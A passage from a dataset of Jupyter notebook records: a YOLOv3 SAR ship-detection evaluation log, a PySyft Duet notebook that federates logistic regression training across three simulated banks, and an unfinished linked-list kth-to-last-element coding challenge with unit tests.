| 0.061798 | 0.068173 |\n| y | 0.046923 | 0.063899 | 0.053193 |\n| w | 0.221638 | 0.112354 | 0.055881 |\n| h | 0.389658 | 0.359653 | 0.184158 |\n| conf | 2.655482 | 2.242971 | 2.841286 |\n| cls | 0.003198 | 0.015148 | 0.070696 |\n| cls_acc | 100.00% | 100.00% | 100.00% |\n| recall50 | 0.352941 | 0.470588 | 0.235294 |\n| recall75 | 0.117647 | 0.117647 | 0.058824 |\n| precision | 0.375000 | 0.266667 | 0.071429 |\n| conf_obj | 0.370246 | 0.461309 | 0.380147 |\n| conf_noobj | 0.006841 | 0.008455 | 0.014260 |\n+------------+--------------+--------------+--------------+\nTotal loss 9.50784683227539\n---- ETA 0:00:00\n\n---- Evaluating Model ----\nDetecting objects: 100%|████████████████████████| 82/82 [00:02<00:00, 40.54it/s]\n"
],
[
"!python test96.py --weights_path checkpoints96/yolov3_ckpt_999.pth --model_def config/yolov3-custom96.cfg --data_config config/custom96.data --img_size=800",
"Namespace(batch_size=8, class_path='data/coco.names', conf_thres=0.001, data_config='config/custom96.data', img_size=800, iou_thres=0.5, model_def='config/yolov3-custom96.cfg', n_cpu=8, nms_thres=0.5, weights_path='checkpoints96/yolov3_ckpt_999.pth')\nCompute mAP...\nDetecting objects: 0%| | 0/493 [00:00<?, ?it/s]/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0038_3000_3800_2400_3200_0.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0075_0_800_600_1400_3.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0117_3600_4400_4200_5000_3.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0126_6000_6800_3000_3800_0.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0099_600_1400_0_800_3.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0112_0_800_1200_2000_3.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0031_1800_2600_3000_3800_0.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0025_1800_2600_0_800_3.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0029_5560_6360_5400_6200_1.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0007_600_1400_7800_8600_3.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0001_0_800_10190_10990_1.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\nDetecting objects: 0%| | 1/493 [00:01<09:42, 1.18s/it]/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0048_1200_2000_2400_3200_2.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0111_6000_6800_9600_10400_2.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0034_1800_2600_5400_6200_0.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0014_3600_4400_4200_5000_2.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\nDetecting objects: 0%| | 2/493 [00:01<07:40, 1.07it/s]/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0018_2400_3200_5400_6200_1.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0121_0_800_3600_4400_3.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0059_1200_2000_4800_5600_2.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\nDetecting objects: 1%|▏ | 3/493 [00:01<06:08, 1.33it/s]/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0048_1800_2600_4800_5600_1.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\nDetecting objects: 1%|▏ | 4/493 [00:02<05:12, 1.57it/s]/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0131_12000_12800_10200_11000_3.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0033_0_800_8400_9200_0.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0012_2400_3200_3600_4400_3.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0025_5460_6260_7200_8000_3.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\nDetecting objects: 1%|▏ | 5/493 [00:02<04:32, 1.79it/s]/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0002_2400_3200_3000_3800_3.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0008_5160_5960_7200_8000_3.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0033_4200_5000_0_800_3.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\nDetecting objects: 1%|▎ | 6/493 [00:02<04:02, 2.01it/s]/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0108_600_1400_6000_6800_2.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0042_3000_3800_6000_6800_3.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0007_4200_5000_2400_3200_2.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\nDetecting objects: 1%|▎ | 7/493 [00:03<03:40, 2.21it/s]/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0028_3600_4400_3600_4400_0.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0024_4800_5600_2400_3200_0.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0070_3100_3900_2400_3200_0.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n/home/cutz/SAR_OD/PyTorch-YOLOv3-master/utils/datasets.py:107: UserWarning: loadtxt: Empty input file: \"/media/data2/dataset/SSDD/800/test/96/labels/P0097_3000_3800_1800_2600_3.txt\"\n boxes = torch.from_numpy(np.loadtxt(label_path).reshape(-1, 5))\n"
]
]
] | [
"code"
] | [
[
"code",
"code"
]
] |
cb533d0058d8c60de5fc661f0bde540353539532 | 141,941 | ipynb | Jupyter Notebook | notebooks/eXate_samples/pysyft/duet_multi/.ipynb_checkpoints/5.0-mg-central-aggregator-checkpoint.ipynb | pbaiz/mmlspark | ab13ad658563da0b1c65636f9c92d9a02b637404 | [
"MIT"
] | null | null | null | notebooks/eXate_samples/pysyft/duet_multi/.ipynb_checkpoints/5.0-mg-central-aggregator-checkpoint.ipynb | pbaiz/mmlspark | ab13ad658563da0b1c65636f9c92d9a02b637404 | [
"MIT"
] | null | null | null | notebooks/eXate_samples/pysyft/duet_multi/.ipynb_checkpoints/5.0-mg-central-aggregator-checkpoint.ipynb | pbaiz/mmlspark | ab13ad658563da0b1c65636f9c92d9a02b637404 | [
"MIT"
] | null | null | null | 102.115827 | 34,072 | 0.829493 | [
[
[
"# Syft Duet for Federated Learning - Central Aggregator\n\n## Setup\n\nFirst we need to install syft 0.3.0 because for every other syft project in this repo we have used syft 0.2.9. However, a recent update has removed a lot of the old features and replaced them with this new 'Duet' function. To do this go into your terminal and cd into the repo directory and run:\n\n> pip uninstall syft\n\nThen confirm with 'y' and hit enter.\n\n> pip install syft==0.3.0\n\nNOTE: Make sure that you uninstall syft 0.3.0 and reinstall syft 0.2.9 if you want to run any of the other projects in this repo. Unfortunately when PySyft updated from 0.2.9 to 0.3.0 it removed all of the previous functionalities for the FL, DP, and HE that have previously been iplemented.",
"_____no_output_____"
]
],
[
[
"# Double check you are using syft 0.3.0 not 0.2.9\n# !pip show syft",
"_____no_output_____"
],
[
"import syft as sy\nimport pandas as pd\nimport torch",
"_____no_output_____"
]
],
[
[
"## Initialising the Duets\n\n",
"_____no_output_____"
]
],
[
[
"portuguese_bank_duet = sy.duet(\"317e830fd06779d42237bcee6483427b\")",
"_____no_output_____"
]
],
[
[
">If the connection is established then there should be a green message above saying 'CONNECTED!'. Ensure the first bank is connected before attempting the connect to the second bank.",
"_____no_output_____"
]
],
[
[
"american_bank_duet = sy.duet(\"d9de11127f79d32c62aa0566d5807342\")",
"_____no_output_____"
]
],
[
[
">If the connection is established then there should be a green message above saying 'CONNECTED!'. Ensure the first and second banks are connected before attempting the connect to the third bank.",
"_____no_output_____"
]
],
[
[
"australian_bank_duet = sy.duet(\"a33531fab99dc31aa53c97e3166b5922\")",
"_____no_output_____"
]
],
[
[
">If the connection is established then there should be a green message above saying 'CONNECTED!'. This should mean that you have connected three seperate duets to three different 'banks' around the world!",
"_____no_output_____"
],
[
"## Check the data exists in each duet",
"_____no_output_____"
]
],
[
[
"portuguese_bank_duet.store.pandas",
"_____no_output_____"
],
[
"american_bank_duet.store.pandas",
"_____no_output_____"
],
[
"australian_bank_duet.store.pandas",
"_____no_output_____"
]
],
[
[
">As a proof of concept for the security of this federated learning method. If you wanted to see/access the data from this side of the connection you can't without permission. To try thi run;\n\n```python\nname_bank_duet.store[\"tag\"].get()\n```\n\n>Where you replace 'name' with the specific banks name and the 'tag' with the data tag. This should through a permissions error and recommend that you request the data from that 'bank'. From here you should run;\n\n```python\nname_bank_duet.store[\"tag\"].request()\n# Or\nname_bank_duet.store[\"tag\"].get(request_block=True)\n```\n\n>Now you have sent a request to the 'bank' side of the connection - now you must wait until on their end they see this requesnt and type the code;\n\n```python\nduet.requests[0].accept()\n```\n\n>Once they accept the request, you can freely get the data on this end - however, for federated learning this should never be explicityl done on data. Only results of computation.",
"_____no_output_____"
],
[
"## Import Test data",
"_____no_output_____"
]
],
[
[
"test_data = pd.read_csv('datasets/test-data.csv', sep = ',')\ntest_target = pd.read_csv('datasets/test-target.csv', sep = ',')\ntest_data.head()",
"_____no_output_____"
],
[
"test_data = torch.tensor(test_data.values).float()\ntest_data",
"_____no_output_____"
],
[
"test_target = torch.tensor(test_target.values).float()\ntest_target",
"_____no_output_____"
],
[
"from sklearn.preprocessing import StandardScaler\n\nsc_X = StandardScaler()\ntest_data = sc_X.fit_transform(test_data)\ntest_data = torch.tensor(test_data).float()\ntest_data",
"_____no_output_____"
]
],
[
[
"## Initialise the local Model",
"_____no_output_____"
]
],
[
[
"class LR(sy.Module):\n\n def __init__(self, n_features, torch_ref):\n super(LR, self).__init__(torch_ref=torch_ref)\n self.lr = torch_ref.nn.Linear(n_features, 1)\n\n def forward(self, x):\n out = self.torch_ref.sigmoid(self.lr(x))\n return out",
"_____no_output_____"
],
[
"local_model = LR(test_data.shape[1], torch)",
"> Creating local model\n"
]
],
[
[
"## Send the Model to each connection",
"_____no_output_____"
]
],
[
[
"portuguese_bank_model = local_model.send(portuguese_bank_duet)",
"> Sending local model\n> Creating remote model\n Sending local layer: lr\n\n> Finished sending local model <\n\n\n"
],
[
"american_bank_model = local_model.send(american_bank_duet)",
"> Sending local model\n> Creating remote model\n Sending local layer: lr\n\n> Finished sending local model <\n\n\n"
],
[
"australian_bank_model = local_model.send(australian_bank_duet)",
"> Sending local model\n> Creating remote model\n Sending local layer: lr\n\n> Finished sending local model <\n\n\n"
]
],
[
[
"### Get the parameters for each model",
"_____no_output_____"
]
],
[
[
"portuguese_bank_parameters = portuguese_bank_model.parameters()",
"_____no_output_____"
],
[
"american_bank_parameters = american_bank_model.parameters()",
"_____no_output_____"
],
[
"australian_bank_parameters = australian_bank_model.parameters()",
"_____no_output_____"
]
],
[
[
"## Create Local torch of the connections 'remote' torch",
"_____no_output_____"
]
],
[
[
"portuguese_bank_remote_torch = portuguese_bank_duet.torch",
"_____no_output_____"
],
[
"american_bank_remote_torch = american_bank_duet.torch",
"_____no_output_____"
],
[
"australian_bank_remote_torch = australian_bank_duet.torch",
"_____no_output_____"
]
],
[
[
"### Define each banks optimiser with 'remote' torchs",
"_____no_output_____"
]
],
[
[
"portuguese_bank_optimiser = portuguese_bank_remote_torch.optim.SGD(portuguese_bank_parameters, lr=1)",
"_____no_output_____"
],
[
"american_bank_optimiser = american_bank_remote_torch.optim.SGD(american_bank_parameters, lr=1)",
"_____no_output_____"
],
[
"australian_bank_optimiser = australian_bank_remote_torch.optim.SGD(australian_bank_parameters, lr=1)",
"_____no_output_____"
]
],
[
[
"### Finally, define the loss criterion for each",
"_____no_output_____"
]
],
[
[
"portuguese_bank_criterion = portuguese_bank_remote_torch.nn.BCELoss()",
"_____no_output_____"
],
[
"american_bank_criterion = american_bank_remote_torch.nn.BCELoss()",
"_____no_output_____"
],
[
"australian_bank_criterion = australian_bank_remote_torch.nn.BCELoss()",
"_____no_output_____"
],
[
"criterions = [portuguese_bank_criterion, american_bank_criterion, australian_bank_criterion]",
"_____no_output_____"
]
],
[
[
"## Train the Models",
"_____no_output_____"
]
],
[
[
"EPOCHS = 25\n\ndef train(criterion, epochs=EPOCHS):\n for e in range(1, epochs + 1):\n # Train Portuguese Bank's Model\n portuguese_bank_model.train()\n portuguese_bank_optimiser.zero_grad()\n portuguese_bank_pred = portuguese_bank_model(portuguese_bank_duet.store[0])\n portuguese_bank_loss = criterion[0](portuguese_bank_pred, portuguese_bank_duet.store[1])\n portuguese_bank_loss.backward()\n portuguese_bank_optimiser.step()\n local_portuguese_bank_loss = None\n local_portuguese_bank_loss = portuguese_bank_loss.get(\n name=\"loss\", \n reason=\"To evaluate training progress\", \n request_block=True, \n timeout_secs=5\n )\n if local_portuguese_bank_loss is not None:\n print(\"Epoch {}:\".format(e))\n print(\"Portuguese Bank Loss: {:.4}\".format(local_portuguese_bank_loss))\n else:\n print(\"Epoch {}:\".format(e))\n print(\"Portuguese Bank Loss: HIDDEN\")\n \n # Train American Bank's Model\n american_bank_model.train()\n american_bank_optimiser.zero_grad()\n american_bank_pred = american_bank_model(american_bank_duet.store[0])\n american_bank_loss = criterion[1](american_bank_pred, american_bank_duet.store[1])\n american_bank_loss.backward()\n american_bank_optimiser.step()\n local_american_bank_loss = None\n local_american_bank_loss = american_bank_loss.get(\n name=\"loss\", \n reason=\"To evaluate training progress\", \n request_block=True, \n timeout_secs=5\n )\n if local_american_bank_loss is not None:\n print(\"American Bank Loss: {:.4}\".format(local_american_bank_loss))\n else:\n print(\"American Bank Loss: HIDDEN\")\n \n # Train Australian Bank's Model\n australian_bank_model.train()\n australian_bank_optimiser.zero_grad()\n australian_bank_pred = australian_bank_model(australian_bank_duet.store[0])\n australian_bank_loss = criterion[2](australian_bank_pred, australian_bank_duet.store[1])\n australian_bank_loss.backward()\n australian_bank_optimiser.step()\n local_australian_bank_loss = None\n local_australian_bank_loss = australian_bank_loss.get(\n name=\"loss\", \n reason=\"To evaluate training progress\", \n request_block=True, \n timeout_secs=5\n )\n if local_australian_bank_loss is not None:\n print(\"Australian Bank Loss: {:.4}\".format(local_australian_bank_loss))\n else:\n print(\"Australian Bank Loss: HIDDEN\")\n\n return ([portuguese_bank_model, american_bank_model, australian_bank_model])\n\nmodels = train(criterions)",
"Epoch 1:\nPortuguese Bank Loss: 0.7693\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.7693\nEpoch 2:\nPortuguese Bank Loss: 0.5677\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.5712\nEpoch 3:\nPortuguese Bank Loss: 0.4772\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.4799\nEpoch 4:\nPortuguese Bank Loss: 0.4215\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.4237\nEpoch 5:\nPortuguese Bank Loss: 0.3855\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.3875\nEpoch 6:\nPortuguese Bank Loss: 0.3613\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.3632\nEpoch 7:\nPortuguese Bank Loss: 0.3442\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.346\nEpoch 8:\nPortuguese Bank Loss: 0.3318\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.3335\nEpoch 9:\nPortuguese Bank Loss: 0.3224\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.3241\nEpoch 10:\nPortuguese Bank Loss: 0.3152\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.3169\nEpoch 11:\nPortuguese Bank Loss: 0.3096\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.3113\nEpoch 12:\nPortuguese Bank Loss: 0.305\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.3068\nEpoch 13:\nPortuguese Bank Loss: 0.3014\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.3031\nEpoch 14:\nPortuguese Bank Loss: 0.2983\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.3001\nEpoch 15:\nPortuguese Bank Loss: 0.2958\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.2976\nEpoch 16:\nPortuguese Bank Loss: 0.2937\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.2955\nEpoch 17:\nPortuguese Bank Loss: 0.292\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.2937\nEpoch 18:\nPortuguese Bank Loss: 0.2904\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.2922\nEpoch 19:\nPortuguese Bank Loss: 0.2891\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.2909\nEpoch 20:\nPortuguese Bank Loss: 0.288\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.2897\nEpoch 21:\nPortuguese Bank Loss: 0.287\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.2888\nEpoch 22:\nPortuguese Bank Loss: 0.2862\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.2879\nEpoch 23:\nPortuguese Bank Loss: 0.2854\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.2872\nEpoch 24:\nPortuguese Bank Loss: 0.2848\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.2865\nEpoch 25:\nPortuguese Bank Loss: 0.2842\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.2859\n"
]
],
[
[
"## Localise the models again",
"_____no_output_____"
]
],
[
[
"# As you can see they are all still remote\nmodels",
"_____no_output_____"
],
[
"local_portuguese_bank_model = models[0].get(\n request_block=True,\n name=\"model_download\",\n reason=\"test evaluation\",\n timeout_secs=5\n )",
"> Downloading remote model\n> Creating local model\n Downloading remote layer: lr\n\n> Finished downloading remote model <\n\n\n"
],
[
"local_american_bank_model = models[1].get(\n request_block=True,\n name=\"model_download\",\n reason=\"test evaluation\",\n timeout_secs=5\n )",
"> Downloading remote model\n> Creating local model\n Downloading remote layer: lr\n\n> Finished downloading remote model <\n\n\n"
],
[
"local_australian_bank_model = models[2].get(\n request_block=True,\n name=\"model_download\",\n reason=\"test evaluation\",\n timeout_secs=5\n )",
"> Downloading remote model\n> Creating local model\n Downloading remote layer: lr\n\n> Finished downloading remote model <\n\n\n"
]
],
[
[
"### Average the three models into on local model",
"_____no_output_____"
]
],
[
[
"with torch.no_grad():\n local_model.lr.weight.set_(((local_portuguese_bank_model.lr.weight.data + local_american_bank_model.lr.weight.data + local_australian_bank_model.lr.weight.data) / 3))\n local_model.lr.bias.set_(((local_portuguese_bank_model.lr.bias.data + local_american_bank_model.lr.bias.data + local_australian_bank_model.lr.bias.data) / 3))",
"_____no_output_____"
]
],
[
[
"## Test the accuracy on the test set",
"_____no_output_____"
]
],
[
[
"def accuracy(model, x, y):\n out = model(x)\n correct = torch.abs(y - out) < 0.5\n return correct.float().mean()\n\nplain_accuracy = accuracy(local_model, test_data, test_target)\nprint(f\"Accuracy on plain test_set: {plain_accuracy}\")",
"Accuracy on plain test_set: 0.8976250290870667\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb534728ba3a3cca4c35199b5f4e67e254ae195a | 5,097 | ipynb | Jupyter Notebook | linked_lists/kth_to_last_elem/kth_to_last_elem_challenge.ipynb | benkeesey/interactive-coding-challenges | 4994452a729f4bcfab5c8a4225f2b5e004b79075 | [
"Apache-2.0"
] | 27,173 | 2015-07-06T12:36:05.000Z | 2022-03-31T23:56:41.000Z | linked_lists/kth_to_last_elem/kth_to_last_elem_challenge.ipynb | benkeesey/interactive-coding-challenges | 4994452a729f4bcfab5c8a4225f2b5e004b79075 | [
"Apache-2.0"
] | 143 | 2015-07-07T05:13:11.000Z | 2021-12-07T17:05:54.000Z | linked_lists/kth_to_last_elem/kth_to_last_elem_challenge.ipynb | benkeesey/interactive-coding-challenges | 4994452a729f4bcfab5c8a4225f2b5e004b79075 | [
"Apache-2.0"
] | 4,657 | 2015-07-06T13:28:02.000Z | 2022-03-31T10:11:28.000Z | 26.273196 | 303 | 0.54895 | [
[
[
"This notebook was prepared by [Donne Martin](http://donnemartin.com). Source and license info is on [GitHub](https://github.com/donnemartin/interactive-coding-challenges).",
"_____no_output_____"
],
[
"# Challenge Notebook",
"_____no_output_____"
],
[
"## Problem: Find the kth to last element of a linked list.\n\n* [Constraints](#Constraints)\n* [Test Cases](#Test-Cases)\n* [Algorithm](#Algorithm)\n* [Code](#Code)\n* [Unit Test](#Unit-Test)\n* [Solution Notebook](#Solution-Notebook)",
"_____no_output_____"
],
[
"## Constraints\n\n* Can we assume this is a non-circular, singly linked list?\n * Yes\n* Can we assume k is a valid integer?\n * Yes\n* If k = 0, does this return the last element?\n * Yes\n* What happens if k is greater than or equal to the length of the linked list?\n * Return None\n* Can you use additional data structures?\n * No\n* Can we assume we already have a linked list class that can be used for this problem?\n * Yes",
"_____no_output_____"
],
[
"## Test Cases\n\n* Empty list -> None\n* k is >= the length of the linked list -> None\n* One element, k = 0 -> element\n* General case with many elements, k < length of linked list",
"_____no_output_____"
],
[
"## Algorithm\n\nRefer to the [Solution Notebook](http://nbviewer.ipython.org/github/donnemartin/interactive-coding-challenges/blob/master/linked_lists/kth_to_last_elem/kth_to_last_elem_solution.ipynb). If you are stuck and need a hint, the solution notebook's algorithm discussion might be a good place to start.",
"_____no_output_____"
],
[
"## Code",
"_____no_output_____"
]
],
[
[
"%run ../linked_list/linked_list.py\n%load ../linked_list/linked_list.py",
"_____no_output_____"
],
[
"class MyLinkedList(LinkedList):\n\n def kth_to_last_elem(self, k):\n # TODO: Implement me\n pass",
"_____no_output_____"
]
],
[
[
"## Unit Test",
"_____no_output_____"
],
[
"\n\n**The following unit test is expected to fail until you solve the challenge.**",
"_____no_output_____"
]
],
[
[
"# %load test_kth_to_last_elem.py\nimport unittest\n\n\nclass Test(unittest.TestCase):\n\n def test_kth_to_last_elem(self):\n print('Test: Empty list')\n linked_list = MyLinkedList(None)\n self.assertEqual(linked_list.kth_to_last_elem(0), None)\n\n print('Test: k >= len(list)')\n self.assertEqual(linked_list.kth_to_last_elem(100), None)\n\n print('Test: One element, k = 0')\n head = Node(2)\n linked_list = MyLinkedList(head)\n self.assertEqual(linked_list.kth_to_last_elem(0), 2)\n\n print('Test: General case')\n linked_list.insert_to_front(1)\n linked_list.insert_to_front(3)\n linked_list.insert_to_front(5)\n linked_list.insert_to_front(7)\n self.assertEqual(linked_list.kth_to_last_elem(2), 3)\n\n print('Success: test_kth_to_last_elem')\n\n\ndef main():\n test = Test()\n test.test_kth_to_last_elem()\n\n\nif __name__ == '__main__':\n main()",
"_____no_output_____"
]
],
[
[
